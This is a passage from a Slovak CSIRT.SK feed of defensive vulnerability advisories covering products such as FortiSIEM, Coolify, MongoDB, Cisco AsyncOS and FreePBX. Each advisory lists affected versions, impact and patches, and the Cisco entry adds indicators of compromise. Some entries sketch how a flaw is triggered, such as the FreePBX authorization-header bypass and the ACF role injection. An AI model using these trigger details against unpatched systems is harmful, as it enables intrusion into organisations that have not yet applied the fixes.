Spoločnosť Cisco odporúča bezodkladnú aktualizáciu zasiahnutých produktov aspoň na verziu 14SU5 alebo 15SU4, alebo inštaláciu záplaty pre podporované verzie podľa informácií na webstránke.

Odkazy:

Mesačná správa CSIRT.SK – december 2025

Marian Danko — Mon, 26 Jan 2026 13:19:41 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci december 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 12/2025 PDF (1 471 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Zraniteľnosť WP modulu Advanced Custom Fields: Extended umožňuje získanie administrátorskej kontroly

Marian Danko — Thu, 22 Jan 2026 15:59:43 +0000

Vývojári modulu Advanced Custom Fields: Extended pre WordPress vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. CVE‑2025‑14533 spočíva v nesprávnej reštrikcii rolí v rámci formulára pre tvorbu a editáciu používateľov. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na získanie administrátorského prístupu a úplnej kontroly nad systémom.

Zraniteľné systémy:

Advanced Custom Fields: Extended verzia 0.9.2.1 a staršie

Opis zraniteľností:

CVE‑2025‑14533 (CVSS 3.1 skóre 9.8)

Kritická zraniteľnosť modulu WordPress Advanced Custom Fields: Extended sa nachádza vo funkcii insert_user, ktorá nekontroluje správnym spôsobom aké používateľské role môže pri registrácii zadať používateľ. Vďaka tomu neautentifikovaný útočník môže pri registrácii zadať rolu „administrator“ a získať administrátorský prístup k celej stránke, čo vedie k úplnému kompromitovaniu inštancie WordPress.

Pozn.: Zraniteľnosť je možné zneužiť len pri použití formulárov Create User alebo Update User, ktoré majú sprístupnené pole rolí.

Možné škody:

Eskalácia privilégií
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame bezodkladnú aktualizáciu modulu ACF: Extended na verziu 0.9.2.2 alebo novšiu, a taktiež aktualizáciu redakčného systému a všetkých modulov. Rovnako odporúčame aj kontroly používateľských kont a logov za účelom identifikácie podozrivej aktivity súvisiacej so zneužitím zraniteľnosti.

Zdroje:

Zraniteľnosť NPM knižnice Binary-Parser umožňuje vzdialené vykonanie kódu

Marian Danko — Thu, 22 Jan 2026 15:58:28 +0000

Vývojári NPM knižnice pre parsovanie binárnych dát binary-parser vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť CVE‑2026‑1245. Táto spočíva v nedostatočnom overovaní používateľských vstupov, čo by mohol vzdialený neautentifikovaný útočník zneužiť na vzdialené vykonanie kódu JavaScript s privilégiami procesu Node.js.

Zraniteľné systémy:

binary-parser Node.js vo verziách starších ako 2.3.0

Opis zraniteľností:

CVE‑2026‑1245 (CVSS 3.1 skóre 6.5)

Zraniteľnosť v knižnici binary-parser pre Node.js súvisí s preberaním nesanitizovaných používateľských hodnôt názvov polí a parametrov kódovania priamo do dynamicky generovaného kódu JavaScript. Vzdialený neautentifikovaný útočník tak môže injektovať a spustiť ľubovoľný kód JavaScript v kontexte procesu Node.js, čo môže viesť k úniku dát, manipulácii s aplikáciou alebo vykonaniu systémových príkazov.

Zraniteľnosť nie je možné zneužiť v aplikáciách používajúcich iba napevno kódované definície parserov.

Možné škody:

Vzdialené vykonanie kódu
Únik citlivých informácií

Odporúčania:

Administrátorom a vývojárom odporúčame uistiť sa, či ich produkty a služby nevyužívajú predmetnú knižnicu v zraniteľnej verzii. V prípade, že áno, odporúčame bezodkladnú aktualizáciu knižnice na verziu 2.3.0.

Zdroje:

Kritická zraniteľnosť Fortinet FortiSIEM

Marian Danko — Fri, 16 Jan 2026 15:44:07 +0000

Spoločnosť Fortinet opravila kritickú zraniteľnosť FortiSIEM, ktorá umožňuje kontrolovať obsah požiadaviek TCP a následne vykonávať kód a príkazy s oprávneniami administrátora, bez potreby autentifikácie.

Zraniteľné systémy:

FortiSIEM 7.4 – 7.4.0
FortiSIEM 7.3 – 7.3.0 až 7.3.4
FortiSIEM 7.2 – 7.2.0 až 7.2.6
FortiSIEM 7.1 – 7.1.0 až 7.1.8
FortiSIEM 7.0 – 7.0.0 až 7.0.4
FortiSIEM 6.7 – 6.7.0 až 6.7.10

Opis činnosti:

CVE-2025-64155 (CVSS skóre 9,8)

Kritická zraniteľnosť FortiSIEM sa nachádza v službe phMonitor, konkrétne vo funkcii phMonitorProcess::initEventHandler. Vyplýva z možnosti prístupu ku jej správcom príkazov bez overenia používateľa a nevhodnej sanitizácie špeciálnych znakov používaných v príkazoch. Vzdialenému neautentifikovanému útočníkovi umožňuje vzdialene vykonávať kód a príkazy s administrátorskými oprávneniami, pomocou špeciálne vytvorených požiadaviek TCP.

Možné škody:

Vzdialené vykonávanie kódu
Eskalácia oprávnení

Odporúčania:

Bezodkladná aktualizácia FortiSIEM aspoň na verziu 7.4.1, 7.3.5, 7.2.7 alebo 7.1.9.

Pokiaľ aktualizácia nie je možná, v rámci mitigácie zraniteľnosti môžete obmedziť prístup na port služby phMonitor, TCP/7900.

Spoločnosť Fortinet odporúča umiestniť FortiSIEM na izolovanú časť siete za firewall, bez prístupu z internetu.

Odkazy:

Kritické zraniteľnosti v NPM knižniciach jsPDF a AdonisJS

Marian Danko — Wed, 14 Jan 2026 13:55:18 +0000

Bezpečnostní výskumníci našli kritické zraniteľnosti vo dvoch knižniciach NPM – jsPDF na generovanie PDF dokumentov a MVC knižnici AdonisJS. Ide o často využívané knižnice, ktoré majú spolu viac ako 3,5 milióna stiahnutí týždenne.

Zraniteľné systémy:

@adonisjs/bodyparser 10.1.1 a staršie
@adonisjs/bodyparser 11.0.0-next.5 a staršie
jsPDF dist/jspdf.node.js verzie staršie ako 4.0.0
jsPDF dist/jspdf.node.min.js verzie staršie ako 4.0.0

Opis zraniteľnosti:

CVE-2026-21440 (CVSS 4.0 skóre 9,2)

Kritická zraniteľnosť balíčka NPM @adonisjs/bodyparser umožňuje prechádzanie súborovou cestou. Nachádza sa v mechanizme spracovania súborov zložených z viacerých častí, konkrétne vo funkcii MultipartFile.move(). Problém nastáva v prípade, keď parameter name nie je odovzdaný ako vstup. Aplikácia vtedy použije neošetrený názov súboru poskytnutý klientom. Vzdialenému neautorizovanému útočníkovi môže umožniť zapisovať ľubovoľné súbory na ľubovoľné miesta v súborovom systéme servera, vrátane prepisovania aktuálnych súborov.

CVE-2025-68428 (CVSS 4.0 skóre 9,2)

Kritická zraniteľnosť knižnice jsPDF umožňuje používateľovi ovplyvniť prvý argument metódy loadFile, čo umožňuje lokálne načítanie súborov (LFI) a prechádzanie súborovou cestou. Vložením neošetrenej cesty má útočník možnosť získať obsah ľubovoľných súborov zo súborového systému, v ktorom beží proces Node.js. Obsah týchto súborov následne bez úprav vloží jsPDF priamo do generovaného PDF dokumentu. Podobne zraniteľné sú aj metódy addImage, html a addFont.

Zraniteľnosti našli Hunter Wodzenski (@wodzen) a výskumníci Endor Labs.

Možné škody:

Únik citlivých dát
Kompromitácia systému
Vzdialené vykonávanie kódu

Odporúčania:

Developerom a systémovým administrátorom, ktorí využívajú zraniteľné knižnice, odporúčame bezodkladnú aktualizáciu na verzie:

jsPDF 4.0.0
@adonisjs/bodyparser 10.1.2
@adonisjs/bodyparser 11.0.0-next.6

Zdroje:

Trend Micro Apex Central obsahuje tri závažné zraniteľnosti

Marian Danko — Mon, 12 Jan 2026 14:04:07 +0000

Spoločnosť Trend Micro vydala bezpečnostné aktualizácie svojho produktu Apex Central pre Windows, ktoré opravujú 3 zraniteľnosti, z čoho 1 je označená ako kritická. Kritická zraniteľnosť umožňuje neautentifikovanému útočníkovi vykonávať vzdialene kód s oprávneniami úrovne SYSTEM. Ďalšie dve zraniteľnosti by mohol vzdialený neautentifikovaný útočník zneužiť na zneprístupnenie služby.

Zraniteľné systémy:

Apex Central, verzie staršie ako Build 7190

Opis činnosti:

CVE-2025-69258 (CVSS skóre 9,8)

Kritická zraniteľnosť sa nachádza v komponente LoadLibraryEX. Vzdialený neautentifikovaný útočník ju môže zneužiť na nahranie škodlivej knižnice DLL zaslaním špeciálne vytvorenej správy na rozhranie MsgReceiver.exe. Tým získa možnosť vzdialeného vykonania kódu s oprávneniami úrovne SYSTEM.

Pre uvedenú zraniteľnosť je voľne dostupný proof-of-concept kód demonštrujúci spôsob jej zneužitia.

CVE-2025-69259 (CVSS skóre 7,5)

Zraniteľnosť vysokej závažnosti spočíva v absencii kontroly návratovej hodnoty NULL pri zasielaní správ na rozhranie MsgReceiver.exe. Vzdialený neautentifikovaný útočník ju môže zneužiť na zneprístupnenie služby pomocou špeciálne vytvorenej správy. Táto navráti hodnotu NULL a spôsobí prístup k neplatnej pamäti.

CVE-2025-69260 (CVSS skóre 7,5)

Zraniteľnosť vysokej závažnosti v MsgReceiver.exe umožňuje čítanie pamäte mimo povolených hodnôt. Chyba sa nachádza v knižnici msgHandlerLogReceiver.dll, ktorá nekontroluje veľkosť premennej x_astring, zodpovednej za vytvorenie ukazovateľa na dáta správy, voči veľkosti vyhradenej pamäte. Vzdialený neautentifikovaný útočník môže hodnotu premennej upraviť tak, že vzniknutý ukazovateľ bude smerovať na neplatnú pamäť. Tým spôsobí nedostupnosť služby.

Možné škody:

Vzdialené vykonávanie kódu
Nedostupnosť služby (DoS)

Odporúčania:

Bezodkladná aktualizácia Apex Central aspoň na Build 7190.

V prípade, že aktualizácia nie je možná, zraniteľnosť je možné mitigovať limitovaním prístupu k zraniteľným systémom len na dôveryhodné IP.

Odkazy:

Platforma Coolify obsahuje 11 kritických zraniteľností

Marian Danko — Fri, 09 Jan 2026 15:08:40 +0000

Vývojári open-source platformy pre manažovanie serverov, aplikácií a databáz Coolify opravili 11 kritických chýb, ktoré môžu viesť k obídeniu autentifikácie, vzdialenému vykonaniu kódu a úplnému kompromitovaniu hostiteľského systému. Chyby zabezpečenia súvisia najmä s neošetrenými parametrami, nad ktorými má kontrolu používateľ. Tieto aplikácia preberá priamo do príkazov pre shell.

Zraniteľné systémy:

Coolify 4.0.0-beta.450 a staršie

Opis činnosti:

CVE-2025-66209 (CVSS skóre 9,9)

Zraniteľnosť vo funkcionalite zálohovania databázy dovoľuje autentifikovanému útočníkovi s príslušnými právami injektovať a vykonávať príkazy na hostiteľskom serveri a získať k nemu plný prístup. Útočník môže zneužiť parameter názvu databázy, ktorý aplikácia preberá do príkazov pre shell bez sanitizácie.

CVE-2025-66210 (CVSS skóre 9,4)

Zraniteľnosť vo funkcionalite importu databázy dovoľuje autentifikovanému útočníkovi injektovať a vykonávať príkazy na spravovanom serveri a získať plný prístup ku infraštruktúre obete. Útočník môže zneužiť parameter názvu databázy, ktorý aplikácia preberá do príkazov pre shell bez sanitizácie.

CVE-2025-66211 (CVSS skóre 9,4)

Zraniteľnosť v narábaní s názvom inicializačného súboru PostgreSQL dovoľuje autentifikovanému útočníkovi s prístupovými právami k databáze injektovať a vykonávať ľubovoľné príkazy na serveri s oprávneniami používateľa root. Aplikácia tento názov preberá do príkazov pre shell bez sanitizácie.

CVE-2025-66212 (CVSS skóre 9,4)

Zraniteľnosť v narábaní s názvom konfiguračného súboru pre dynamickú proxy dovoľuje autentifikovanému útočníkovi s manažmentovými právami k serveru injektovať a vykonávať príkazy na spravovanom serveri s oprávneniami používateľa root. Aplikácia tento názov preberá do príkazov pre shell bez sanitizácie.

CVE-2025-66213 (CVSS skóre 9,4)

Zraniteľnosť vo funkcionalite File Storage Directory Mount Path dovoľuje autentifikovanému útočníkovi s manažmentovými právami k aplikácii alebo službe injektovať a vykonávať príkazy na spravovanom serveri s oprávneniami používateľa root. Aplikácia preberá parameter file_storage_directory_source do príkazov pre shell bez sanitizácie.

CVE-2025-64419 (CVSS skóre 9,6)

Zraniteľnosť súvisí s neošetrenými vstupmi z docker-compose.yaml, ktoré aplikácia používa v príkazoch. Útočníkovi dovoľuje injektovať a vykonávať ľubovoľné systémové príkazy na zraniteľnej inštancii Coolify s oprávneniami používateľa root.

CVE-2025-64420 (CVSS skóre 9,9)

Zraniteľnosť umožňuje útočníkovi s nízkymi oprávneniami získať privátny kľúč používateľa root pre Coolify, čím získa administrátorský prístup na server cez SSH.

CVE-2025-64424 (CVSS skóre 9,4)

Zraniteľnosť gitových nešpecifikovaných polí pre používateľské vstupy, ktorá umožňuje útočníkovi s nízkymi oprávneniami injektovať a vykonávať ľubovoľné systémové príkazy na zraniteľnej inštancii Coolify s oprávneniami používateľa root.

CVE-2025-59156 (CVSS skóre 9,4)

Zraniteľnosť, ktorá umožňuje útočníkovi s nízkymi oprávneniami injektovať ľubovoľné direktívy Docker Compose a získať schopnosť vykonávať príkazy na hostiteľskom systéme s oprávneniami používateľa root. Tým efektívne unikne z kontajnera.

CVE-2025-59157 (CVSS skóre 9,9)

Zraniteľnosť, ktorá umožňuje útočníkovi s používateľskými oprávneniami pri nasádzaní injektovať cez pole Git Repository ľubovoľné príkazy pre shell a vykonávať ich na hostiteľskom systéme.

CVE-2025-59158 (CVSS skóre 9,4)

Zraniteľnosť súvisí s nevhodným spôsobom sanitizácie používateľských vstupov. Útočníkovi s nízkymi oprávneniami umožňuje vykonať útok typu stored XSS pri vytváraní projektu. Pre uloženie škodlivého kódu JavaScript môže zneužiť názov projektu. Keď ku projektu pristúpi administrátor, napríklad aby ho zmazal, uložený skript sa vykoná v kontexte jeho prehliadača.

Možné škody:

Vzdialené vykonávanie kódu
Obídenie bezpečnostných prvkov
Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia Coolify aspoň na verziu 4.0.0-beta.451.

Odkazy:

Mesačný prehľad kritických zraniteľností december 2025

Marian Danko — Thu, 08 Jan 2026 12:00:24 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci december 2025.

Mesačný prehľad – 12/2025 PDF (554 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

MongoBleed: aktívne zneužívaná zraniteľnosť MongoDB Server umožňuje čítať pamäť

Marian Danko — Mon, 05 Jan 2026 08:55:31 +0000

Vývojári MongoDB Server opravili vysoko závažnú zraniteľnosť umožňujúcu vzdialenému neautentifikovanému útočníkovi manipulovať premenné v hlavičkách požiadaviek a získavať tak citlivé informácie z pamäte na halde (angl. heap) v rámci operačnej pamäte. Zraniteľnosť je aktívne zneužívaná.

Zraniteľné systémy:

MongoDB Server v8.2 staršie ako 8.2.3
MongoDB Server v8.0 staršie ako 8.0.17
MongoDB Server v7.0 staršie ako 7.0.28
MongoDB Server v6.0 staršie ako 6.0.27
MongoDB Server v5.0 staršie ako 5.0.32
MongoDB Server v4.4 staršie ako 4.4.30
MongoDB Server v4.2, všetky verzie
MongoDB Server v4.0, všetky verzie
MongoDB Server v3.6, všetky verzie

Opis činnosti:

CVE-2025-14847 (CVSS v4 skóre 8,7)

Aplikácia MongoDB Server obsahuje vysoko závažnú zraniteľnosť, ktorá umožňuje vzdialenému neautentifikovanému útočníkovi čítať neinicializovanú pamäť na halde, priradenú databáze. Chyba zabezpečenia súvisí s neošetrenou dĺžkou polí protokolových hlavičiek správ, ktoré boli skomprimované pomocou nástroja Zlib. V správe OP_COMPRESSED môže útočník manipulovať hodnotu premennej „uncompressedSize“ a prepísať ju na väčšiu ako je veľkosť obsahu správy. Aplikácia následne bez kontroly na základe hodnoty tejto premennej alokuje vyrovnávaciu pamäť. Server následne v rámci chybového hlásenia vypíše obsah správy spolu s obsahom nadbytočnej pamäte.

Zraniteľnosť dostala názov MongoBleed a je aktívne zneužívaná. Existuje pre ňu verejne dostupný kód demonštrujúci možnosti jej zneužitia.

Možné škody:

Únik citlivých informácií

Odporúčania:

Odporúčame bezodkladnú aktualizáciu aplikácie MongoDB Server aspoň na verziu 8.2.3, 8.0.17, 7.0.28, 6.0.27, 5.0.32, alebo 4.4.30.

Pre mitigáciu zraniteľnosti do doby aktualizácie aplikácie môžete zakázať komprimovanie požiadaviek nástrojom zlib. Odporúča sa tiež zakázať komunikáciu z internetu na port TCP 27017 a povoliť prístup iba z dôveryhodných zdrojov.

Taktiež odporúčame vykonať kontrolu logov na prítomnosť pokusov o zneužitie zraniteľnosti, na čo možno použiť, napríklad aj špeciálne vytvorený nástroj MONGOBLEED DETECTOR. Dôležité je vykonať aj zmenu hesiel a kryptografického materiálu, ktorý mohol uniknúť.

Odkazy:

Kritická zraniteľnosť Hewlett Packard Enterprise OneView

Marian Danko — Fri, 19 Dec 2025 13:31:14 +0000

Spoločnosť HPE varuje pred kritickou zraniteľnosťou manažmentovej platformy OneView, ktorá umožňuje vzdialené vykonávanie kódu.

Zraniteľné systémy:

HPE OneView všetky verzie po 10.20 vrátane

Opis činnosti:

CVE-2025-37164 (CVSS v3.1 skóre 10,0)

Spoločnosť Hewlett Packard Enterprise (HPE) opravila zraniteľnosť s maximálnou závažnosťou v manažmentovom softvéri OneView. Chyba zabezpečenia umožňuje neautentifikovanému útočníkovi vzdialené vykonávanie kódu.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia HPE OneView aspoň na verziu 11.00.

Alternatívne môžete pre verzie 5.20 až 10.20 zraniteľnosť mitigovať aplikáciou hotfixu. Pri upgrade verzie 6.60.xx na 7.00.00 a pri reimaging HPE Synergy Composer je potrebné hotfix aplikovať znovu. Pre HPE Synergy Composer nájdete hotfix tu.

Odkazy:

Aktívne zneužívaná zraniteľnosť SonicWall SMA1000

Marian Danko — Thu, 18 Dec 2025 12:27:35 +0000

Spoločnosť SonicWall vydala bezpečnostné aktualizácie pre zariadenia SonicWall SMA1000, ktoré opravujú aktívne zneužívanú zraniteľnosť. Zraniteľnosť strednej závažnosti CVE‑2025‑40602 spočíva v nedostatočnej autorizácii v rámci konzoly AMC (Application Management Console) a lokálny útočník by ju mohol zneužiť na eskaláciu privilégií.

Zraniteľné systémy:

SonicWall SMA1000 verzie 12.4.3-03093 a staršie
SonicWall SMA1000 verzie 12.5.0-02002 a staršie

Opis činnosti:

CVE-2025-40602 (CVSS skóre 6,6)

Aktívne zneužívaná zraniteľnosť zariadení SonicWall Secure Mobile Access série 1000 strednej závažnosti sa nachádza v manažmentovej konzole (AMC). Súvisí s nesprávne implementovaným spôsobom autorizácie. Útočníkom umožňuje lokálne eskalovať svoje oprávnenia.

Zraniteľnosť je aktívne zneužívaná v tandeme s kritickou CVE-2025-23006, čo útočníkom umožňuje vzdialene vykonávať kód s oprávneniami používateľa root.

Možné škody:

Eskalácia oprávnení

Odporúčania:

Bezodkladná aktualizácia SonicWall SMA1000 aspoň na verzie 12.4.3-03245 a 12.5.0-02283.

Pokiaľ aktualizácia nie je možná, mitigovať zraniteľnosť môžete obmedzením prístupu k zariadeniu len na dôveryhodné IP adresy, cez VPN.

Odkazy:

Kritickú zraniteľnosť Cisco AsyncOS aktívne zneužívajú vo viacerých kampaniach

Marian Danko — Thu, 18 Dec 2025 11:05:07 +0000

Spoločnosť Cisco varovala pred aktívnym zneužívaním kritickej zero‑day zraniteľnosti v produktoch Cisco SEG (Secure Email Gateway) a SEWM (Secure Email and Web Manager). Zraniteľnosť s identifikátorom CVE‑2025‑20393 v operačnom systéme AsyncOS umožňuje vzdialene vykonávať systémové príkazy a kompromitovať zraniteľný systém.

Zraniteľné systémy:

Cisco Secure Email Gateway (predtým Cisco Email Security Appliance)
Cisco Secure Email and Web Manager (predtým Cisco Content Security Management Appliance)

Opis činnosti:

CVE-2025-20393 (CVSS skóre 10,0)

Kritická zero-day zraniteľnosť zariadení Cisco SEG a Cisco SEWM je aktívna, keď má zariadenie povolenú a do internetu vystavenú funkcionalitu Spam Quarantine. Zraniteľnosť sa nachádza v operačnom systéme Cisco AsyncOS a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie systémových príkazov s oprávneniami root.

Zraniteľnosť je aktívne zneužívaná minimálne od konca novembra 2025. Podľa skupiny Cisco Talos zraniteľnosť zneužíva čínska skupina UAT‑9686 pri nasadzovaní perzistentných zadných dvierok AquaShell, nástrojov pre vytváranie reverzných tunelov SSH AquaTunnel a TPC/UDP Chisel a nástroja pre čistenie logov AquaPurge.

Možné škody:

Vzdialené vykonávanie systémových príkazov
Získanie kontroly nad zariadením

Odporúčania:

Na uvedenú zraniteľnosť v súčasnosti nie sú dostupné aktualizácie. Výrobca administrátorom odporúča:

limitovať prístup k zariadeniam na dôveryhodné IP adresy
chrániť zariadenia firewallom,
používať bezpečnú autentifikáciu, napríklad prostredníctvom SAML alebo LDAP,
zmeniť predvolené heslá,
používať SSL/TLS certifikáty na zabezpečenie manažmentovej prevádzky,
pre Cisco SEG oddeliť funkcie pre spracovanie e‑mailov a manažment na nezávislé sieťové rozhrania,
monitorovať logy sieťovej prevádzky na prítomnosť podozrivých prístupov a pokusov o zneužitie zraniteľnosti a prítomnosť indikátorov kompromitácie.

V prípade potvrdenej kompromitácie je potrebná obnova zariadenia do pôvodného stavu / továrenských nastavení. O pomoc s preverením vášho zariadenia môžete požiadať Cisco na oficiálnych stránkach.

Indikátory kompromitácie:

Hashe

2db8ad6e0f43e93cc557fbda0271a436f9f2a478b1607073d4ee3d20a87ae7ef
145424de9f7d5dd73b599328ada03aa6d6cdcee8d5fe0f7cb832297183dbe4ca
85a0b22bd17f7f87566bd335349ef89e24a5a19f899825b4d178ce6240f58bfc
2D89FB7455FF3EBF6B965D8B1113857607F7FBDA4C752CCB591DBC1DC14BA0DA
47EC51B5F0EDE1E70BD66F3F0152F9EB536D534565DBB7FCC3A05F542DBE4428
be1037fac396cf54fb9e25c48e5b0039b3911bb8426cbf52c9433ba06c0685ce
3cd5703d285ed2753434f14f8da933010ecfdc1e5009d0e438188aaf85501612
3c1b9df801b9abbb3684670822f367b5b8cda566b749f457821b6481606995b3

IP adresy

172[.]233[.]67[.]176
172[.]237[.]29[.]147
38[.]54[.]56[.]95

Odkazy:

Mesačná správa CSIRT.SK – november 2025

Marian Danko — Wed, 17 Dec 2025 10:49:01 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci november 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 11/2025 PDF (1 994 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Zraniteľnosti FreePBX umožňujú získať kontrolu nad systémom

Marian Danko — Tue, 16 Dec 2025 15:08:58 +0000

Vývojári FreePBX opravili jednu kritickú a dve vysoko závažné zraniteľnosti v aplikácii FreePBX Endpoint Manager. Kritická zraniteľnosť umožňuje obísť autentifikáciu, zatiaľ čo ostatné dve dovoľujú získavať a meniť dáta v SQL databáze a nahrávať ľubovoľné súbory.

Zraniteľné systémy:

FreePBX 16, verzie staršie ako 16.0.44 a 16.0.92
FreePBX 17, verzie staršie ako 17.0.6 a 17.0.23

Opis činnosti:

Bezpečnostní výskumníci spoločnosti Horizon3.ai odhalili tri závažné zraniteľnosti v open‑source platforme FreePBX. Ich zreťazením môže neautentifikovaný útočník čítať a zapisovať v SQL databáze a nahrávať súbory vrátane webshellov do zraniteľnej aplikácie.

CVE-2025-66039 (CVSSv4.0 skóre 9,3)

Kritická zraniteľnosť umožňujúca obídenie autentifikácie sa nachádza v komponente FreePBX Endpoint Manager. Útočník ju môže zneužiť manipuláciou hlavičky Authorization, v ktorej nastaví hodnotu typu autentifikácie na „webserver“. Nemusí pritom disponovať platnými prihlasovacími údajmi.

Zraniteľnosť nie je možné zneužiť pri štandardnej konfigurácii FreePBX.

CVE-2025-61675 (CVSSv4.0 skóre 8,6)

Vysoko závažná zraniteľnosť v komponente FreePBX Endpoint Manager, ktorá zahŕňa chyby umožňujúce injektovanie SQL dopytov autentifikovanému útočníkovi vo viacerých častiach aplikácie. Tak môže čítať a manipulovať citlivé informácie v databáze.

CVE-2025-61678 (CVSSv4.0 skóre 8,6)

Vysoko závažná zraniteľnosť v komponente FreePBX Endpoint Manager, ktorá umožňuje autentifikovanému útočníkovi zneužiť koncový bod pre nahrávanie firmvéru a nahrávať ľubovoľné súbory. Chyba zabezpečenia sa nachádza v parametri „fwbrand“, ktorý umožňuje meniť súborové cesty. Útočník môže získať prístup ku zraniteľnému systému nahratím webshellu alebo môže vzdialene vykonávať kód.

Možné škody:

Únik citlivých informácií
Obídenie bezpečnostných prvkov
Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia FreePBX aspoň na verziu 16.0.44, 16.0.92, 17.0.6, alebo 17.0.23.

Pre mitigáciu zraniteľnosti CVE-2025-66039 nastavte “Authorization Type” na “usermanager”, vypnite v pokročilých nastaveniach parametre „Display Friendly Name“, „Display Readonly Settings“ a „Override Readonly Settings“ a reštartujte systém. Podrobnejší návod nájdete tu.

Odkazy:

Apple opravila aktívne zneužívané zraniteľnosti svojich OS a prehliadača

Marian Danko — Mon, 15 Dec 2025 14:08:37 +0000

Apple vydala aktualizácie na opravu dvoch zero-day zraniteľností, ktoré sa nachádzajú v nástroji WebKit prehliadača Safari a ďalších prehliadačov na iOS a knižnici ANGLE pre Google Chrome pre Mac. CVE-2025-43529 umožňuje vykonávanie ľubovoľného kódu a možno ju zneužiť spracovaním škodlivého webového obsahu. CVE-2025-14174 môže viesť k poškodeniu pamäte.

Zraniteľné systémy:

iOS 26.2, iPadOS 26.2 – iPhone 11 a novšie, iPad Pro 12.9-inch 3rd generation a novšie, iPad Pro 11-inch 1st generation a novšie, iPad Air 3rd generation a novšie, iPad 8th generation a novšie, iPad mini 5th generation a novšie
iOS 18.7.3, iPadOS 18.7.3 – iPhone XS a novšie, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation a novšie, iPad Pro 11-inch 1st generation a novšie, iPad Air 3rd generation a novšie, iPad 7th generation a novšie, iPad mini 5th generation a novšie
macOS Tahoe 26.2 – zariadenia Mac s macOS Tahoe
tvOS 26.2 – Apple TV HD a Apple TV 4K (všetky modely)
watchOS 26.2 – Apple Watch Series 6 a novšie
visionOS 26.2 – Apple Vision Pro (všetky modely)
Safari 26.2 – zariadenia Mac s macOS Sonoma a Sequoia
Google Chrome pre Mac verzie staršej ako 143.0.7499.110

Opis činnosti:

Spoločnosť Apple opravila dve vysoko závažné zraniteľnosti v nástroji WebKit, ktoré útočníci aktívne zneužívajú. Jedna z nich je obsiahnutá aj v grafickej knižnici ANGLE verzie prehliadača Google Chrome pre Mac. Zraniteľnosti zasahujú široké spektrum operačných systémov a zariadení Apple.

CVE-2025-14174 (CVSS skóre 8,8)

Zraniteľnosť nástroja WebKit umožňuje pristupovať k pamäti mimo povolené hodnoty. Útočník ju môže zneužiť pomocou špeciálne vytvorenej HTML webovej stránky.

CVE-2025-43529

Zraniteľnosť nástroja WebKit vyplýva z možnosti použitia dealokovaného miesta v pamäti. Umožňuje vykonávať ľubovoľný kód pri spracúvaní škodlivého webového obsahu.

Možné škody:

Únik citlivých informácií
Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia zasiahnutých systémov a zariadení aspoň na verzie:

iOS 26.2, iPadOS 26.2
iOS 18.7.3, iPadOS 18.7.3
macOS Tahoe 26.2
tvOS 26.2
watchOS 26.2
visionOS 26.2
Safari 26.2
Google Chrome pre Mac 143.0.7499.110

Odkazy:

Kritická zraniteľnosť Apache Tika umožňuje injektovať XML

Marian Danko — Mon, 08 Dec 2025 12:59:19 +0000

Vývojári Apache Tika vydali opravné aktualizácie pre viacero modulov, do ktorých je možné injektovať externé entity XML. Zneužitím opravenej zraniteľnosti môže útočník získať schopnosť čítať citlivé dáta alebo vzdialene vykonávať kód.

Zraniteľné systémy:

Apache Tika core (org.apache.tika:tika-core) 1.13 až 3.2.1
Apache Tika parsers (org.apache.tika:tika-parsers) 1.13 až 1.28.5
Apache Tika PDF parser module (org.apache.tika:tika-parser-pdf-module) 2.0.0 až 3.2.1

Opis činnosti:

CVE-2025-66516 (CVSSv4 skóre 10,0)

Vývojári Apache Tika opravili kritickú zraniteľnosť umožňujúcu injektovanie externého XML (útoky typu XXE) pomocou špeciálne vytvoreného súboru XFA vloženého v PDF. Útočník tak získa schopnosť čítať citlivé dáta, pristupovať ku interným zdrojom, a v najzávažnejšom prípade aj vzdialene vykonávať kód.

Zraniteľnosť je rozšírením predošlej CVE-2025-54988 o ďalšie zraniteľné moduly.

Možné škody:

Únik citlivých informácií
Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia Apache Tika-core a Tika-parser-pdf-module na verziu 3.2.2 a Tika-parsers na 2.0.0.

Odkazy:

Kritická zraniteľnosť React Server Components umožňuje vykonávať kód

Marian Danko — Fri, 05 Dec 2025 13:46:36 +0000

Vývojári platformy JavaScript React opravili kritickú zraniteľnosť v React Server Components, ktorá umožňuje vzdialené vykonávanie kódu na serveri. Zasiahnuté sú viaceré balíčky npm, vrátane platformy Next.js. Zraniteľnosť dostala pomenovanie React2Shell.

Zraniteľné systémy:

React Server Components (react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack) 19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js verzie 15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6 a staršie
Next.js verzie canary, od 14.3.0-canary.77
Platformy react-router, waku, @parcel/rsc, @vitejs/plugin-rsc, rwsdk, expo, …

Opis činnosti:

CVE-2025-55182 (CVSS skóre 10,0)

